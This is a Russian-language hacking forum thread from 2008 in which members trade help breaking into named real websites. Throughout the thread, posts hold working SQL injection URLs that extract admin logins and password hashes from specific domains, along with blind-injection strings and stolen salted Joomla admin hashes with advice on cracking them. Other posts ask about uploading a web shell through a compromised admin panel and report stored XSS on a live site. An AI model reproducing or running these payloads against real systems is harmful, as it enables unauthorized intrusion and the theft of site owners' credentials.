Проблема такая - есть админка, есть возможность редактирования страниц ( в т.ч. вставка произвольного пхп кода, который выполнится ) ( все страницы в виде site.com/kkk.php?id=x ) , но вставив код веб-шелла в одну из страниц и перейдя по ней я увидел вместо шелла какие-то каракули =/ Что можно сделать чтобы получить веб-шелл ?
Евал шелл имеется
0nep@t0p, попробуй вставить зашифрованный код.. или как вариант - код простенького аплоадера, а через него ( если он выполнится ) заливай шел.. но если каракули там скорее всего MIME type не для выполнения стоит
superboys
13.08.2008, 01:44
piton;cazzo
дай форум залью шелл )
http://nightspirits.net/forum/ на лови
Доброго времени суток всем.
Поможите пожалуйста столкнулся с проблемой при вводе корректной sql-инъекции(где имена полей угаданы после суточного ручного перебора) сайт выдаёт свою дефолтную страницу, пример:
_http://www.tarmatrade.ee/index.php?cat=-1+union+select+1,concat_ws(0x3a,nimi,parool)+from+ tarma_kasutajad+limit+0,1/*
для наглядности зделаем ошибку в поле с именем nimi, заменим на name
_http://www.tarmatrade.ee/index.php?cat=-9999+union+select+1,concat_ws(0x3a,name,parool)+fr om+tarma_kasutajad+limit+0,1/*
и картина уже совершенно иная.
Как всё же обойти эту защиту и прочитать результат запроса. (пробовал через Navisckope, но то ли руки кривые, то ли...)
MaSTeR GэN
15.08.2008, 07:59
2zjuk@ полей для вывода нет выход только слепая иньекция )
2zjuk@ полей для вывода нет выход только слепая иньекция )
Это печально =(((
Shaitan-Devil
16.08.2008, 15:41
ТОварисчи есть ли методы обхода mod-rewrite,а то скуль нашел.Гуглил.
Taylorith
16.08.2008, 16:44
сегодня гуляя по сайте наткнулся на такое...
Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151
интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
сегодня гуляя по сайте наткнулся на такое...
Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151
интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
>> Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Нету доступа к мускулю. Это не уязвимость.
Taylorith
16.08.2008, 17:04
ясн спасибо
http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables--
какие мысли ?
Red_Red1
17.08.2008, 01:32
Да что то информатион_схема недоступна.
Но мысли есть вот такие
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user_name)),6,7+from+us er
;)
Вдогонку ;)
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.u ser+limit+0,1
Вдогонку ;)
это понятно..) я про information_schema спрашивал. всеровно спс.)
ап
Cry Wolf
17.08.2008, 08:05
Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мылаbla'<script>alert()</script> получил переадресацию на другой сайт.
alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 176
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 181
Это уязвимость? Или просто тупой глюк?
truelamer
17.08.2008, 09:02
Достал я парол я хэши из джумлы
admin:6f0f0e2db9c8f58e2b309afa6569f744:oSX0uUSDl4I rdL63
или
admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I
а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?
Достал я парол я хэши из джумлы
admin:6f0f0e2db9c8f58e2b309afa6569f744:oSX0uUSDl4I rdL63
или
admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I
а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать?
прога PasswordsPro при добавлении тип хеша указываешь MD5(HMAC), должно помочь
truelamer
17.08.2008, 10:02
спасибо но думаю не в этом дело, я то знаю сервисы где md5 можно подобрать, А тут вроде как конкотинасия пароля с правой кадаброй после :. Вот мне интересны сервисы кот позволяют узнать пароль вбив хэш и кадабру. Или как это вообще можно сделать
BlackSun
17.08.2008, 11:02
Это не кадабра, это соль. Юзай PasswordsPro
сервис..мм..попробуй, там по моему соленые мд5 тоже катят:
https://hashcracking.info/
truelamer
17.08.2008, 16:29
а вот это какого вида???
admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I
вида md5(md5($pass).$salt) или какого?
Jokester
17.08.2008, 16:39
Если джумла то md5($pass.$salt)
помогие со скулей
http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,3,4,5,6,7,8,9,0,1/*
нимогу ни версию ни всего остольного получить
Jokester
17.08.2008, 19:22
SVAROG
http://www.wfsj.org/resources/page.php?id=-69+union+select+1,2,UNHEX(HEX(version())),4,5,6,7, 8,9,0,1/*
georgich
17.08.2008, 20:29
Вот хотел узнать, как можно узнать адрес админки? Ну, а потом, если повезет, то и багу какую-нибудь для доступа к сайту. Буду очень признателен за инфу. Спасибо.
Elephant
17.08.2008, 21:03
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11+from+gtaco m_gta.tables+where+TABLE_NAME=users,12,13,14,15,16 ,17,18,19,20/*
Что я неправельно сделал?
Мне надо из базы посмотреть названия таблиц, а я немогу((((9
0nep@t0p
17.08.2008, 21:13
0_о
Это пипец какой-то. Я покушал валидола, успокоился и отвечаю, запрос апсолютна нихрена неправильный - это раз. Во - вторых версия мускула 4, имена всех таблиц ты никак не увидишь, только перебор таблиц -
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20/*
И вот тебе бонус -
http://gta.com.ua/file_sa_details.phtml?id=-59+union+select+1,2,3,concat(username,0x3a,passwor d),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +admin/*
Читай маны, а то после еще одного такого поста у мну инфаркт случится
http://site.com/account/index.php?n=shops&shop=9+and+ascii(substring((SELECT+concat(username ,0x3a,password)+from+account+limit+0,1),1,1))>51
Ситуация такова: веб-сервер с мускулом 5, нашел уязвимость . Знаю названия: базы,таблиц,колонок. Посредством слепой иньекции выудил логин(username) и хэш(password) админа из таблицы account (см. выше)
Вопрос:
Т.к. не удается сбрутить хэш ( хэш из пароля видимо получается в несколько неизвестных шагов,а не просто "sha1(password)"), возник вопрос. Как модифицировать в этой же таблице "account" значение в колонке "banned" с 1 на 0 ?
0nep@t0p
17.08.2008, 21:38
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
Это майскуль, разделение запросов в ней отсутствует, то есть модифицировать информацию в базе данных посредством скуль инъекции тебе не удастся
Понятно... А существует ли иной способ модификации инфы(через php например) ?
Cry Wolf
18.08.2008, 02:43
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?
Вот ссылка http://gayby.org/news/comments/192.html
Это майскуль, разделение запросов в ней отсутствует
А точка с запятой?
Ded MustD!e
18.08.2008, 07:03
Возник такой вопрос. Ввел в строку имени в коментах к статьям привычный <script>alert()</script>, имя в комментарии не отобразилось, а при каждом входе на страницу теперь опера выдает уведомление о выполнении джава скрипта... Это активная XSS?
Вот ссылка http://gayby.org/news/comments/192.html
Да, там кстати кавычки фильтруются.
А точка с запятой?
Нет, не путай MySQL5 и MSSQL
Shaitan-Devil
18.08.2008, 09:56
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
http://www.savchenko.ru/developments/84.html
Ded MustD!e
18.08.2008, 10:01
Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт
http://www.savchenko.ru/developments/84.html
Невижу вопроса. /85-1.html уязвимость есть.
Shaitan-Devil
18.08.2008, 10:12
Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot